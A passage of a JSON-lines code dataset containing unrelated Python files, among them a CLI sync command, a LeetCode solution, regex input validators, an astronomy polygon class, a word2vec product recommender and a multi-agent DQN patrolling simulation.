remote_connection=context.remote_connection\n )\n source_directory = status_response.data.get('remote_source_directory')\n source_path = os.path.join(\n source_directory if source_directory else '',\n 'cauldron.json'\n )\n\n if status_response.failed or not source_directory:\n status_response.log_notifications()\n return context.response.consume(status_response)\n\n directory_exists = os.path.exists(source_directory)\n definition_exists = os.path.exists(source_path)\n\n if not directory_exists or not definition_exists:\n return context.response.fail(\n code='NO_PROJECT',\n message='No project exists locally at: {}'.format(source_directory)\n ).console(\n whitespace=1\n ).response\n\n sync_response = do_synchronize(\n context=context,\n source_directory=source_directory,\n newer_than=status_response.data.get('sync_time', 0)\n )\n\n return context.response.consume(sync_response)\n","sub_path":"cauldron/cli/commands/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"258576694","text":"# #best solution\n# class Solution:\n# def dominantIndex(self, nums):\n# \"\"\"\n# :type nums: List[int]\n# :rtype: int\n# \"\"\"\n# if len(nums) <= 1:\n# return 0\n# m = max(nums)\n# ind = nums.index(m)\n# del nums[ind]\n# m_2 = max(nums)\n# return ind if m >= 2*m_2 else -1\n\nclass Solution:\n def dominantIndex(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n firstBig = 0\n secondBig = 0\n thatIndex = 0\n \n for index,item in enumerate(nums):\n if item > firstBig:\n secondBig = firstBig\n firstBig = item\n thatIndex = index\n elif item > secondBig:\n secondBig = item\n \n if len(nums) == 1:\n return 0\n elif firstBig >= 2*secondBig:\n return thatIndex\n else:\n return -1","sub_path":"array_largestNumberAtLeastTwiceOfOthers.py","file_name":"array_largestNumberAtLeastTwiceOfOthers.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"432511029","text":"import logging\nimport re\n\n\n# TeamRome\ndef check_input_str(string: str, title=True) -> str or None:\n \"\"\" pattern: одно-два слова, слова с русскими и английскими буквами,\n апострафами, двойние слова, слова с цыфрами\"\"\"\n if re.match(\"^[a-zA-Zа-яА-Я0-9'-_]{1,100}[ ]?[-]?[a-zA-Zа-яА-Я0-9'-_]{0,100}$\", string):\n print(\"check_input_str(): %s\" % string)\n if title:\n return string.title()\n else:\n return string\n else:\n logging.error(\"check_input_str() Fail: %s\" % string)\n return None\n\n\n# TeamRome\ndef check_telegram(string: str) -> str or None:\n \"\"\" pattern: @tele, @123qwe, @qwe12, @asd11_sd1 \"\"\"\n if re.match(\"^[@][a-zA-Zа-яА-Я_0-9]{1,100}$\", string):\n print(\"check_telegram(): %s\" % string)\n return string\n else:\n logging.error(\"check_telegram() Fail: %s\" % string)\n return None\n\n\n# TeamRome\ndef check_home_number(string: str) -> str or None:\n \"\"\" pattern: 12/4, 13-4, 1a, f/2, 5/e, 6-y \"\"\"\n if re.match(\"^[0-9a-zA-Zа-яА-Я/-]{1,10}$\", string):\n print(\"check_home_number(): %s\" % string)\n return string\n else:\n logging.error(\"check_home_number() Fail: %s\" % string)\n return None\n\n\n# TeamRome\ndef check_phone(phone: str) -> str or None:\n \"\"\" pattern: +375291234567 \"\"\"\n if re.match(\"^[+][0-9]{1,20}$\", phone):\n print(\"check_phone(): %s\" % phone)\n return phone\n else:\n logging.error(\"check_phone() Fail: %s\" % phone)\n return None\n\n\n# TeamRome\ndef check_if_str(string: str, out: str or None) -> str:\n print(\"check_if_str()\")\n if string:\n return string\n else:\n return out\n","sub_path":"client/edit/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"596909951","text":"\nimport math\nfrom typing import Union\n\nimport starlink\nimport starlink.Ast as Ast\nimport astropy.units as u\nimport astropy\nimport numpy as np\n\nfrom .region import ASTRegion\nfrom ..mapping import ASTMapping\nfrom ..mapping import ASTFrame, ASTSkyFrame\nfrom ..exc import FrameNotFoundException\n\n__all__ = [\"ASTPolygon\"]\n\nclass ASTPolygon(ASTRegion):\n\t\n\tdef __init__(self, ast_object:starlink.Ast.Polygon=None, frame:Union[ASTFrame, starlink.Ast.Frame]=None, points=None, fits_header=None):\n\t\t'''\n\t\tASTPolygon is an ASTRegion that represents a polygon, a collection of vertices on a sphere in a 2D plane.\n\n\t\tAccepted signatures for creating an ASTPolygon:\n\t\t\n\t\tp = ASTPolygon(frame, points)\n\t\tp = ASTPolygon(fits_header, points) # get the frame from the FITS header provided\n\t\tp = ASTPolygon(ast_object) # where ast_object is a starlink.Ast.Polygon object\n\n\t\tPoints may be provided as a list of coordinate points, e.g.\n\t\t\t[(x1, y1), (x2, y2), ... , (xn, yn)]\n\t\tor as two parallel arrays, e.g.\n\t\t\t[[x1, x2, x3, ..., xn], [y1, y2, y3, ..., yn]]\n\t\t\n\t\t:param ast_object: Create a new ASTPolygon from an existing :class:`starlink.Ast.Polygon` object.\n\t\t:param frame: The frame the provided points lie in, accepts either ASTFrame or starlink.Ast.Frame objects.\n\t\t:param points: Points (in degrees if frame is a SkyFrame) that describe the polygon, may be a list of pairs of points or two parallel arrays of axis points.\n\t\t:returns: Returns a new ASTPolygon object.\n\t\t'''\n\t\t\n\t\tif ast_object:\n\t\t\tif any([frame, points, fits_header]):\n\t\t\t\traise ValueError(\"ASTPolygon: Cannot specify 'ast_object' along with any other parameter.\")\n\t\t\t# test object\n\t\t\tif isinstance(ast_object, starlink.Ast.Polygon):\n\t\t\t\tsuper().__init__(ast_object=ast_object)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\traise Exception(\"ASTPolygon: The 'ast_object' provided was not of type starlink.Ast.Polygon.\")\n\n\t\tif points is None:\n\t\t\traise Exception(\"A list of points must be provided to create a polygon. This doesn't seem like an unreasonable request.\")\n\n\t\t# Get the frame from the FITS header\n\t\tif fits_header:\n\t\t\tif frame is not None:\n\t\t\t\traise ValueError(\"ASTPolygon: Provide the frame via the 'frame' parameter or the FITS header, but not both.\")\n\t\t\t\n\t\t\tfrom ..channel import ASTFITSChannel\n\t\t\tframe_set = ASTFrameSet.fromFITSHeader(fits_header=fits_header).baseFrame # raises FrameNotFoundException\n\t\t\n\t\tif isinstance(frame, starlink.Ast.Frame):\n\t\t\tast_frame = frame\n\t\telif isinstance(frame, ASTFrame):\n\t\t\tast_frame = frame.astObject\n\t\telse:\n\t\t\traise Exception(\"ASTPolygon: The supplied 'frame' object must either be a starlink.Ast.Frame or ASTFrame object.\")\n\t\t\n\t\tif isinstance(frame, (starlink.Ast.SkyFrame, ASTSkyFrame)):\n\t\t\tpoints = np.deg2rad(points)\n\t\t\n\t\t# The problem with accepting both forms is that the case of two points is ambiguous:\n\t\t# [[x1,x2], [y1, y2]]\n\t\t# [(x1,y1), (x2, y2}]\n\t\t# I'm going to argue that two points does not a polygon make.\n\t\tif len(points) == 2 and len(points[0]) == 2:\n\t\t\traise Exception(\"There are only two points in this polygon, making the point ordering ambiguous. But is it really a polygon?\")\n\t\t\n\t\t# Internally, the starlink.Ast.Polygon constructor takes the parallel array form of points.\n\t\t# starlink.Ast.Polygon( ast_frame, points, unc=None, options=None )\n\n\t\tparallel_arrays = not (len(points[0]) == 2)\n\t\t\n\t\tif parallel_arrays:\n\t\t\tself.astObject = Ast.Polygon(ast_frame, points)\n\t\telse:\n\t\t\tif isinstance(points, np.ndarray):\n\t\t\t\tself.astObject = Ast.Polygon(ast_frame, points.T)\n\t\t\telse:\n\t\t\t\t# Could be a list or lists or tuples - reshape into parallel array form\n\t\t\t\tdim1 = np.zeros(len(points))\n\t\t\t\tdim2 = np.zeros(len(points))\n\t\t\t\tfor idx, (x, y) in points:\n\t\t\t\t\tdim1[idx] = x\n\t\t\t\t\tdim2[idx] = y\n\t\t\t\t\n\t\t\t\tself.astObject = Ast.Polygon(ast_frame, np.array([dim1, dim2]))\n\t\n\t@staticmethod\n\tdef fromPointsOnSkyFrame(radec_pairs:np.ndarray=None, ra=None, dec=None, system:str=None, skyframe:ASTSkyFrame=None, expand_by=20*u.pix): # astropy.coordinates.BaseRADecFrame\n\t\t'''\n\t\tCreate an ASTPolygon from an array of points. NOTE: THIS IS SPECIFICALLY FOR SKY FRAMES.\n\t\t\n\t\t:param ra: list of RA points, must be in degrees (or :class:`astropy.units.Quantity` objects)\n\t\t:param dec: list of declination points, must be in degrees (or :class:`astropy.units.Quantity` objects)\n\t\t:param system: the coordinate system, see cornish.constants for accepted values\n\t\t:param frame: the frame the points lie in, specified as an ASTSkyFrame object\n\t\t:returns: new ASTPolygon object\n\t\t'''\n\t\t# author: David Berry\n\t\t#\n\t\t# This method uses astConvex to find the shortest polygon enclosing a\n\t\t# set of positions on the sky. The astConvex method determines the\n\t\t# required polygon by examining an array of pixel values, so we first\n\t\t# need to create a suitable pixel array. An (M,M) integer array is first\n\t\t# created and initialised to hold zero at every pixel. A tangent plane\n\t\t# projection is then determined that maps the smallest circle containing\n\t\t# the specified (RA,Dec) positions onto the grid of (M,M) pixels. This\n\t\t# projection is then used to convert each (RA,Dec) position into a pixel\n\t\t# position and a value of 1 is poked into the array at each such pixel\n\t\t# position. The astConvex method is then used to determine the shortest\n\t\t# polygon that encloses all pixels that have value 1 in the array.\n\t\t#\n\t\t# This polygon is then modified by moving each vertex 20 pixels radially\n\t\t# away from the centre of the bounding disc used to define the extent of\n\t\t# the pixel grid.\n\t\t#\n\t\t# Finally, the resulting polygon is mapping from pixel coordinates to\n\t\t# (RA,Dec).\n\t\t\n\t\t# Set the required positional accuracy for the polygon vertices, given\n\t\t# as an arc-distance in radians. The following value corresponds to 10\n\t\t# arc-seconds. The size of the array (M) is selected to give pixels\n\t\t# that have this size. Alternatively, specify a non-zero value for M\n\t\t# explicitly, in which case the pixel size will be determined from M.\n\t\tACC = 4.85E-5\n\t\tM = 0\n\t\t\n\t\t# A SkyFrame describing the (RA,Dec) values.\n\t\t#skyfrm = Ast.SkyFrame( \"System=FK5,Equinox=J2000,Epoch=1982.0\" )\n\t\t\n\t\t# The RA values (radians).\n# \t\tra_list = [ 0.1646434, 0.1798973, 0.1925398, 0.2024329, 0.2053291,\n# \t\t 0.1796907, 0.1761278, 0.1701603, 0.1762123, 0.1689954,\n# \t\t 0.1725925, 0.1819018, 0.1865827, 0.19369, 0.1766037 ]\n# \t\t\n# \t\t# The Dec values (radians).\n# \t\tdec_list = [ 0.6967545, 0.706133, 0.7176528, 0.729342, 0.740609,\n# \t\t 0.724532, 0.7318467, 0.7273944, 0.7225725, 0.7120513,\n# \t\t 0.7087136, 0.7211723, 0.7199059, 0.7268493, 0.7119532 ]\n\n\t\t# .. todo:: handle various input types (np.ndarray, Quantity)\n\t\tif isinstance(skyframe, (ASTSkyFrame, Ast.SkyFrame)):\n\t\t\t# if it's a sky frame of some kind, we will expect degrees\n\t\t\tra = np.deg2rad(ra)\n\t\t\tdec = np.deg2rad(dec)\n\t\t\t\n\t\tra_list = ra\n\t\tdec_list = dec\n\t\t\t\t\n\t\t# convert frame parameter to an Ast.Frame object\n\t\tif isinstance(skyframe, ASTFrame):\n\t\t\tskyframe = skyframe.astObject\n\t\telif isinstance(skyframe, Ast.Frame):\n\t\t\tpass\n\t\telse:\n\t\t\traise ValueError(f\"The 'skyframe' parameter must be either an Ast.SkyFrame or ASTSkyFrame object; got {type(skyframe)}\")\n\t\t\n\t\t# Create a PointList holding the (RA,Dec) positions.\n\t\tplist = Ast.PointList( skyframe, [ra_list, dec_list] )\n\t\t\n\t\t# Get the centre and radius of the circle that bounds the points (in\n\t\t# radians).\n\t\t(centre,radius) = plist.getregiondisc()\n\t\t\n\t\t# Determine the number of pixels (M) along each size of the grid that\n\t\t# will produce pixels equal is size of ACC. If a non-zero value for M\n\t\t# has already been set, use it.\n\t\tif M == 0 :\n\t\t M = int( 1 + 2.0*radius/ACC )\n\t\t#logger.debug(f\"Using grid size {M}\")\n\t\t\n\t\t# Create a minimal set of FITS-WCS headers that describe a TAN\n\t\t# projection that projects the above circle into a square of M.M\n\t\t# pixels. The reference point is the centre of the circle and is put\n\t\t# at the centre of the square grid. Put the headers into a FitsChan.\n\t\tfc = Ast.FitsChan()\n\t\tfc[\"NAXIS1\"] = M\n\t\tfc[\"NAXIS2\"] = M\n\t\tfc[\"CRPIX1\"] = 0.5*( 1 + M )\n\t\tfc[\"CRPIX2\"] = 0.5*( 1 + M )\n\t\tfc[\"CRVAL1\"] = centre[0]*Ast.DR2D\n\t\tfc[\"CRVAL2\"] = centre[1]*Ast.DR2D\n\t\tfc[\"CDELT1\"] = 2.0*radius*Ast.DR2D/( M - 1 )\n\t\tfc[\"CDELT2\"] = 2.0*radius*Ast.DR2D/( M - 1 )\n\t\tfc[\"CTYPE1\"] = 'RA---TAN'\n\t\tfc[\"CTYPE2\"] = 'DEC--TAN'\n\t\t\n\t\t# Re-wind the FitsChan and read the FrameSet corresponding to the above\n\t\t# FITS headers.\n\t\tfc.clear(\"Card\")\n\t\twcs = fc.read()\n\t\t\n\t\t# Use this FrameSet to transform all the (RA,Dec) positions into pixel\n\t\t# coordinates within the grid.\n\t\t( x_list, y_list ) = wcs.tran( [ra_list, dec_list], False )\n\t\t\n\t\t# Create an integer numpy array of the same shape, filled with zeros.\n\t\tar = np.zeros( shape=(M,M), dtype=int )\n\t\t\n\t\t# Poke a value 1 into the above array at each pixel position, checking\n\t\t# each such position is inside the array.\n\t\tfor (x,y) in zip( x_list, y_list ):\n\t\t ix = int( round( x ) )\n\t\t iy = int( round( y ) )\n\t\t if ix >= 1 and ix <= M and iy >= 1 and iy <= M:\n\t\t ar[ iy - 1, ix - 1 ] = 1\n\t\t\n\t\t# Create a Polygon representing the convex hull that encloses the\n\t\t# positions. This Polygon is defined in pixel coordinaates within the\n\t\t# grid defined by the above FITS headers.\n\t\tpix_poly = Ast.convex( 1, Ast.EQ, ar, [1,1], [M,M], False )\n\t\t\n\t\t\n\t\tif expand_by.to_value(u.pix) > 0:\n\t\t\t# Now expand the above polygon a bit. First get the vertex positions\n\t\t\t# from the Polygon.\n\t\t\t(x_list, y_list ) = pix_poly.getregionpoints()\n\t\t\t\n\t\t\t# Transform the centre position from sky to pixel coordinates.\n\t\t\t( x_cen, y_cen ) = wcs.tran( [[centre[0]], [centre[1]]], False )\n\t\t\t\n\t\t\t# For each vertex, extend it's radial vector by 20 pixels. Create lists\n\t\t\t# of extended x and y vertex positions. [Expanding about the centroid of\n\t\t\t# the original vertices may give better results than expanding about the\n\t\t\t# centre of the bounding disc in some cases].\n\t\t\tx_new = []\n\t\t\ty_new = []\n\t\t\tfor (x,y) in zip( x_list, y_list ):\n\t\t\t dx = x - x_cen[0]\n\t\t\t dy = y - y_cen[0]\n\t\t\t old_radius = math.sqrt( dx*dx + dy*dy )\n\t\t\t new_radius = old_radius + 20\n\t\t\t factor = new_radius/old_radius\n\t\t\t dx *= factor\n\t\t\t dy *= factor\n\t\t\t x_new.append( dx + x_cen[0] )\n\t\t\t y_new.append( dy + y_cen[0] )\n\t\t\n\t\t\t# Create a new polygon in pixel coordinates using the extended vertex positions.\n\t\t\tbig_poly = Ast.Polygon( wcs.getframe( Ast.BASE ), [ x_new, y_new ] )\n\t\t\t\n\t\t\t# Transform the Polygon into (RA,Dec).\n\t\t\tnew_ast_polygon = big_poly.mapregion( wcs, skyframe )\n\t\t\n\t\telse:\n\t\t\t# Transform the Polygon into (RA,Dec)\n\t\t\tnew_ast_polygon = pix_poly.mapregion( wcs, skyframe )\n\t\t\n\t\treturn ASTPolygon(ast_object=new_ast_polygon)\n\t\t\n\t\n\tdef downsize(self, maxerr=None, maxvert=0):\n\t\t'''\n\t\tReturns a new ASTPolygon that contains a subset of the vertices of this polygon.\n\t\t\n\t\tThe subset is chosen so that the returned polygon is a good approximation of this polygon,\n\t\twithin the limits specified. The density of points in the new polygon is greater\n\t\twhere the curvature of the boundary is greater.\n\t\t\n\t\tThe 'maxerr' parameter set the maximum allowed discrepancy between the original and\n\t\tnew polygons as a geodesic distance within the polygon's coordinate frame. Setting this to zero\n\t\treturns a new polygon with the number of vertices set in \"maxvert\".\n\t\t\n\t\tThe 'maxvert' parameter set the maximum number of vertices the new polygon can have. If this is\n\t\tless than 3, the number of vertices in the returned polygon will be the minimum needed\n\t\tto achieve the maximum discrepancy specified by \"maxerr\". The unardoned value is in radians,\n\t\tbut accepts Astropy unit objects.\n\t\t\n\t\t@param maxerr Maximum allowed discrepancy in radians between the original and new polygons as a geodesic distance within the polygon's coordinate frame.\n\t\t@param maxvert Maximum allowed number of vertices in the returned Polygon.\n\t\t@returns A new ASTPolygon.\n\t\t'''\n\t\t\n\t\t# should find some reasonable default values\n\t\tif None in [maxerr, maxvert]:\n\t\t\traise Exception(\"ASTPolygon.downsize: Both 'maxerr' and 'maxvert' must be specified.\")\n\t\t\n\t\tast_polygon = self.astObject.downsize(maxerr, maxvert)\n\t\treturn ASTPolygon(ast_object=ast_polygon)\n\n\n\n","sub_path":"cornish/region/polygon.py","file_name":"polygon.py","file_ext":"py","file_size_in_byte":12160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"292681311","text":"from engpy.misc.abilities import numable\nfrom engpy.misc.miscs import num\nfrom engpy.misc.gen import getter\nfrom engpy.misc.vars import greek_map\n\n\ndef laplace(expres, in_var='t', out_var='s'):\n if in_var in greek_map:\n in_var = greek_map[in_var]\n new = expres.recreate\n res = new(''); modifier = {}\n refract = '0'\n if len(out_var) > 1:\n refract = new(out_var)\n out_var = 's'\n \n for expr in expres.struct:\n \n if numable(expr):\n res += f'{expr}/{out_var}'\n continue\n coeff = expr._coeff\n var = expr.expr[coeff][0]\n if len(var) > 1:\n if 'ȩ' in var:\n pows = var.pop('ȩ')\n res += laplace(new({coeff:[var]}), in_var,out_var).cal({f'{out_var}':f'{out_var} - {pows.coeff(in_var)}'})\n continue\n if in_var in var:\n pows = var.pop(in_var)\n if pows > 0:\n res += (-1)** pows * laplace(new({coeff:[var]}), in_var,out_var).lin_diff(f'{out_var}',pows)\n continue\n var_ = list(var)[0]; pow_ = var[var_]\n if getter(var_,'name') not in (None, 'new'):\n res += coeff * var_.laplace(in_var, out_var)\n elif isinstance(var_, str):\n if var_ == in_var:\n res += coeff * new(f'{pow_}!/{out_var}^({pow_} + 1)')\n elif var_ == 'ȩ' and not isinstance(pow_, int):\n res += coeff * ~new(f'{out_var} - {pow_.coeff(in_var)}')\n\n return res.unify(True) if isinstance(refract, str) else res.cal(s = refract).unify(True)\n","sub_path":"engpy/lib/transforms/laplace.py","file_name":"laplace.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"482793630","text":"import importlib\r\nfrom abc import ABC, abstractmethod\r\n\r\n\r\n# An abstract class that implements and declares common functionality to all parent selection methods\r\nclass ParentSelection(ABC):\r\n\r\n @abstractmethod\r\n def getCandidates(self, citizens):\r\n raise NotImplementedError\r\n\r\n @staticmethod\r\n def factory(parentSelectionName):\r\n module = importlib.import_module('entities.parentselection.' + parentSelectionName)\r\n parentSelection = getattr(module, parentSelectionName)\r\n return parentSelection()\r\n","sub_path":"entities/parentselection/ParentSelection.py","file_name":"ParentSelection.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"542606357","text":"import re\nimport sys\nimport json\nimport gzip\nimport logging\nimport itertools\nimport pymorphy2\nimport numpy as np\nimport pandas as pd\nfrom annoy import AnnoyIndex\nfrom gensim.models.word2vec import Word2Vec\nimport pickle as pkl\n\nProduct_dict = pkl.load(open('Product_dict.pkl', 'rb'))\ndata=pd.read_csv('data.csv',nrows=100000)\ndata=data.applymap(str)\ndata['id']=data['contact_id']+' '+data['shop_id']+' ' +data['product_category_id']\ndata=data.drop(columns=['contact_id','shop_id','product_category_id'])\nmodel = Word2Vec.load('./hackaton.w2v_gensim3')\nmodel.similar_by_vector(model['1260627'] )\ndata_storage = {i[1]['product_id']:i[1]['id'] for i in data.iterrows()}\nindex_img_emb = AnnoyIndex(100)\nindex_img_emb.load('./hackaton_annoy_30')\nmap_id_hashimg = pkl.load(open('hackaton_map_id_to_hash_products.dict5', 'rb'))\nprod1 = pd.read_csv('prod111.csv')\nprod1.fillna(value='', inplace=True)\nprod1=prod1.applymap(str)\nprod1.drop(prod1.columns[prod1.columns.str.contains('unnamed',case = False)],axis = 1, inplace = True)\n\n\ndef request_id(a=134832):\n pr = data.loc[data['product_id'] == str(a)]\n pr.reset_index(inplace=True, drop=False)\n vector = pr['id'][0]\n\n vec = np.zeros(100)\n for word in vector.split(' '):\n if word in model:\n vec += model[word]\n\n data_storage_norm1 = vec\n annoy_res = list(index_img_emb.get_nns_by_vector(data_storage_norm1, 13, include_distances=True, search_k=10000))\n print('\\n\\nСоседи:')\n a = list()\n for annoy_id, annoy_sim in itertools.islice(zip(*annoy_res), 13):\n image_id = map_id_hashimg[annoy_id]\n # print(image_id)\n # print(data_storage[image_id], 1 - annoy_sim ** 2 / 2)\n a.append(list(prod1.loc[prod1['index'] == str(image_id)]['0']))\n\n return a\n\n","sub_path":"bot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"27582256","text":"import numpy as np\nimport random\nimport time\nimport math\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom models import DQN\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\nfrom sklearn import preprocessing\nfrom collections import namedtuple\n\nnum_node = 30\nfile = open(\"Data\\data_\" + str(num_node) + \".txt\", 'r', encoding='UTF-8') \nline = file.readlines()\n\nnum_node = int(line[0])\nnum_edge = int(line[1])\nnum_agent = int(line[num_node + num_edge + 2])\nconstraint = int(line[num_node + num_edge + num_agent + 3])\nmaxspeed = 0 \nCost = 0\n# lists = \"Model\\_3f_dist_no\"\n# lists = \"Model\\_3f_dist_1\"\nlists = \"Model\\_3f_dist_2\"\n# lists = \"Model\\saved_\"\n\nclass Node:\n def __init__(self, pos, number):\n self.pos = pos\n self.number = number\n self.connected_node = [] \n self.in_commu_range = [] #溝通範圍(constraint)內的node\n self.all_ag_here = [] #在這個node上的agent\n \nclass Edge:\n def __init__(self, distance, number):\n self.ox = 'x'\n self.distance = distance \n self.number = number\n self.count = 0\n \nclass Agent:\n def __init__(self, cur, speed, number):\n self.currnode_ori = cur\n self.currnode = cur \n self.togonode = cur \n self.lastedge = 0\n self.togoedge = 0\n self.curedge_length = 0 \n self.step = 0\n self.speed = speed\n self.cost = 0\n self.num = number\n self.historyaction = []\n self.reward = 0\n self.start = cur\n self.edgeLengthInfo = []\n self.alreadyVisitInfo = []\n self.edgeTotalConnectMap = [[0]*num_edge for i in range(num_edge)]\n self.edgeTotalConnectInfo = []\n self.totalAgentMap = [[0]*2 for i in range(num_edge)]\n self.totalAgentInfo = []\n self.edgeCountInfo = []\n for i in range(num_edge):\n self.edgeLengthInfo.append(0)\n self.alreadyVisitInfo.append(0)\n self.edgeTotalConnectInfo.append(0)\n self.totalAgentInfo.append(0)\n self.edgeCountInfo.append(0)\n self.featureUpdate = []\n for i in range(num_agent): \n j = set()\n self.featureUpdate.append(j)\n\nnode_ALL = []\nedge_ALL = {}\nagent_ALL = []\n\nfor i in range(num_node):\n k = i + 2\n line[k] = line[k].split()\n for j in range(len(line[k])): \n line[k][j] = int(line[k][j])\n l = Node((line[k][1], line[k][2]), line[k][0])\n node_ALL.append(l)\n\nfor i in range(num_edge):\n k = num_node + i + 2\n line[k] = line[k].split()\n for j in range(len(line[k])): \n line[k][j] = int(line[k][j])\n l = Edge(line[k][2], i)\n line[k].pop()\n edge_ALL[tuple(line[k])] = l \n start = line[k][0]\n end = line[k][1]\n node_ALL[start].connected_node.append(end) \n node_ALL[end].connected_node.append(start)\n\nfor i in range(num_agent):\n k = num_node + num_edge + i + 3\n line[k] = line[k].split()\n for j in range(len(line[k])): \n line[k][j] = int(line[k][j])\n l = Agent(int(line[k][1]), int(line[k][2]), int(line[k][0]))\n agent_ALL.append(l)\n if(maxspeed < int(line[k][2])): maxspeed = int(line[k][2])\n node_ALL[l.currnode].all_ag_here.append(i)\n\n#算哪些node在溝通範圍(constraint)內\ndef cal_dis(a,b): return np.sqrt(np.square(abs(a.pos[0]-b.pos[0]))+np.square(abs(a.pos[1]-b.pos[1])))\nfor i in range(num_node):\n for j in range(num_node):\n if(cal_dis(node_ALL[i],node_ALL[j]) <= constraint): node_ALL[i].in_commu_range.append(j)\n\ndef find_edge(a,b):\n if tuple([a,b]) in edge_ALL: return tuple([a,b])\n else: return tuple([b,a])\n\n# 特徵矩陣 (todo)\nnum_feature = 3\ndef feature_matrix(ag):\n X = np.zeros((num_node, num_feature))\n for k in node_ALL[ag.currnode].connected_node:\n ed = edge_ALL[find_edge(ag.currnode,k)].number\n # 距離\n if ag.edgeLengthInfo[ed] != 0: \n X[k][0] = ag.edgeLengthInfo[ed]\n # # 被幾個edge走到\n X[k][1] = ag.edgeTotalConnectInfo[ed]\n # 此edge被走過幾次\n X[k][2] = ag.edgeCountInfo[ed]\n X = np.around((X), decimals=3)\n return X\n\ndef update_info():\n for u in range(num_agent):\n for give in agent_ALL:\n for receive in agent_ALL:\n if receive.currnode in node_ALL[give.currnode].in_commu_range and give.num != receive.num:\n j = set()\n for infomation in set(give.featureUpdate[receive.num]):\n feat, edge = infomation\n if feat == 0: \n if receive.edgeLengthInfo[edge] == 0:\n receive.edgeLengthInfo[edge] = give.edgeLengthInfo[edge]\n j.add(infomation)\n if feat == 1: \n if receive.edgeTotalConnectInfo[edge] < give.edgeTotalConnectInfo[edge]: \n receive.edgeTotalConnectInfo[edge] = give.edgeTotalConnectInfo[edge]\n j.add(infomation)\n if feat == 2: \n if receive.edgeCountInfo[edge] < give.edgeCountInfo[edge]: \n receive.edgeCountInfo[edge] = give.edgeCountInfo[edge]\n j.add(infomation)\n for i in range(num_agent): \n if i != give.num and i != receive.num: receive.featureUpdate[i] = receive.featureUpdate[i].union(j)\n give.featureUpdate[receive.num].clear()\n elif give.num == receive.num: give.featureUpdate[receive.num].clear()\n\nmodel = DQN(nfeat=num_feature)\nmodel.load_state_dict(torch.load(lists))\n\ndef pick_edge(ag): \n X = feature_matrix(ag)\n output = model(torch.from_numpy(X))\n outputnum = -1\n outputmax = -math.inf\n for i in range(num_node):\n if output[i] >= outputmax and i in node_ALL[ag.togonode].connected_node:\n outputmax = output[i]\n outputnum = i\n return outputnum\n\ndef walking(ag):\n if ag.currnode_ori != ag.togonode : \n edge_ALL[find_edge(ag.currnode_ori, ag.togonode)].ox = 'o'\n ag.edgeLengthInfo[edge_ALL[ag.togoedge].number] = ag.curedge_length\n ag.alreadyVisitInfo[edge_ALL[ag.togoedge].number] = 1\n for i in range(num_agent): ag.featureUpdate[i].add(tuple([0, edge_ALL[ag.togoedge].number]))\n ag.currnode = ag.togonode\n ag.currnode_ori = ag.togonode\n ag.lastedge = ag.togoedge\n ag.historyaction.append(ag.togonode)\n ag.step = ag.step - ag.curedge_length \n ag.togonode = pick_edge(ag)\n togo_edge = find_edge(ag.currnode, ag.togonode)\n ag.curedge_length = edge_ALL[togo_edge].distance\n ag.togoedge = togo_edge\n if ag.lastedge != ag.togoedge and ag.lastedge != 0:\n head = edge_ALL[ag.lastedge].number\n tail = edge_ALL[ag.togoedge].number\n ag.edgeTotalConnectMap[head][tail] = 1\n ag.edgeTotalConnectMap[tail][head] = 1\n ag.edgeTotalConnectInfo[head] = sum(ag.edgeTotalConnectMap[head])\n ag.edgeTotalConnectInfo[tail] = sum(ag.edgeTotalConnectMap[tail])\n for i in range(num_agent): \n ag.featureUpdate[i].add(tuple([1, head]))\n ag.featureUpdate[i].add(tuple([1, tail]))\n edge_ALL[ag.togoedge].count += 1\n ag.edgeCountInfo[edge_ALL[ag.togoedge].number] = edge_ALL[ag.togoedge].count\n for i in range(num_agent): ag.featureUpdate[i].add(tuple([2, edge_ALL[ag.togoedge].number]))\n\nk = 10000\nwhile not all(edge_ALL[r].ox == 'o' for r in edge_ALL):\n for ag in agent_ALL:\n ag.step += ag.speed\n ag.cost += ag.speed\n while ag.curedge_length <= ag.step: \n update_info()\n node_ALL[ag.currnode].all_ag_here.remove(ag.num)\n walking(ag) \n node_ALL[ag.currnode].all_ag_here.append(ag.num)\n if ag.step > ag.curedge_length/2:\n node_ALL[ag.currnode].all_ag_here.remove(ag.num) \n ag.currnode = ag.togonode\n node_ALL[ag.currnode].all_ag_here.append(ag.num)\n update_info()\n Cost += maxspeed\n if Cost > k:\n print(Cost)\n k += 10000\n\n\n# Write all action to file\nfileforHistoryaction = \"Animation/RL_\"+ str(num_node) +\".txt\"\nf = open(fileforHistoryaction, \"w\")\nprint(num_node, file = f)\nfor i in agent_ALL: print(i.historyaction, file = f)\n\nallEdgeCost = 0\nfor i in edge_ALL: allEdgeCost += edge_ALL[i].distance\nallAgentCost = 0\nfor i in agent_ALL: allAgentCost += i.cost\nall_historyaction = -num_agent\nfor i in agent_ALL: all_historyaction += len(i.historyaction)\n\n# for i in agent_ALL: print(i.historyaction)\nprint(\"Map cost = \",allEdgeCost)\nprint(\"All agents' cost = \",allAgentCost)\nprint(\"Repeated rate = \",\"%.2f\"%((all_historyaction-num_edge)/all_historyaction*100),\"%\") \nprint(\"Largest cost = 